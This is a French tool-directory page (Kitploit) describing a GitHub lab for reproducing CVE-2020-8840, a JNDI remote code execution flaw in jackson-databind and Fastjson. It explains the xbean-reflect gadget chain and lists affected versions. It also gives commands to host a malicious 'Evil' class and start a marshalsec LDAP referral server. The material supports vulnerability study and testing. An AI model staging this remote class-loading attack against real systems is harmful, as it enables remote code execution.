Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-8840 — Vulnérabilité d'exécution de code à distance dans Jackson-databind (CVE-2020-8840) code d'environnement d'analyse et de reproduction | Kitploit
Outils/GitHubGitHub/veraxy00/cve-2020-8840
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubveraxy00/cve-2020-8840

CVE-2020-8840

Vulnérabilité d'exécution de code à distance dans Jackson-databind (CVE-2020-8840) code d'environnement d'analyse et de reproduction

Voir le dépôt
4248il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-8840

Code d'analyse et de reproduction de l'environnement pour la vulnérabilité d'exécution de code à distance dans Jackson-databind (CVE-2020-8840).

Le projet contient :

  • Payloads dans jackson-databind et Fastjson
  • Classe malveillante WebServer
  • marshalsec-0.0.3-SNAPSHOT-all.jar compilé

Présentation de la vulnérabilité

La vulnérabilité d'exécution de code à distance dans Jackson-databind (CVE-2020-8840) permet à un attaquant d'utiliser la chaîne d'exploitation xbean-reflect (org.apache.xbean.propertyeditor.JndiConverter) pour déclencher le chargement de classes à distance via JNDI, atteignant ainsi une exécution de code à distance.

Cette vulnérabilité affecte également certaines versions de jackson-databind et Fastjson.

jackson-databind

Versions concernées : 2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

Mise en place simplifiée de l'environnement

Le service LDAP indiqué dans le code d'exemple doit être configuré par vos soins.

WebServer

Démarrez un service HTTP, hébergez la classe malveillante (la classe Evil.java est fournie dans le projet).

root@kitploit:~
python -m http.server 2222

Service LDAP

Téléchargez l'outil Marshalsec, compilez-le en fichier JAR, démarrez le service LDAP et définissez l'adresse codebase (le WebServer qui héberge la classe malveillante).

Par souci de commodité, pour éviter les opérations de téléchargement et de compilation, le projet inclut également marshalsec-0.0.3-SNAPSHOT-all.jar (le code du projet n'est pas volumineux, c'est la principale raison de sa taille importante), compilé avec JDK8.

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

Fastjson

Versions concernées : Fastjson <= 1.2.62

L'environnement de reproduction est le même que ci-dessus ; vous devez démarrer vous-même les services WebServer et LDAP.

Références

  • https://github.com/FasterXML/jackson-databind
  • https://github.com/FasterXML/jackson-databind/issues/2620
  • https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
  • https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
  • https://github.com/alibaba/fastjson
Télécharger l’outil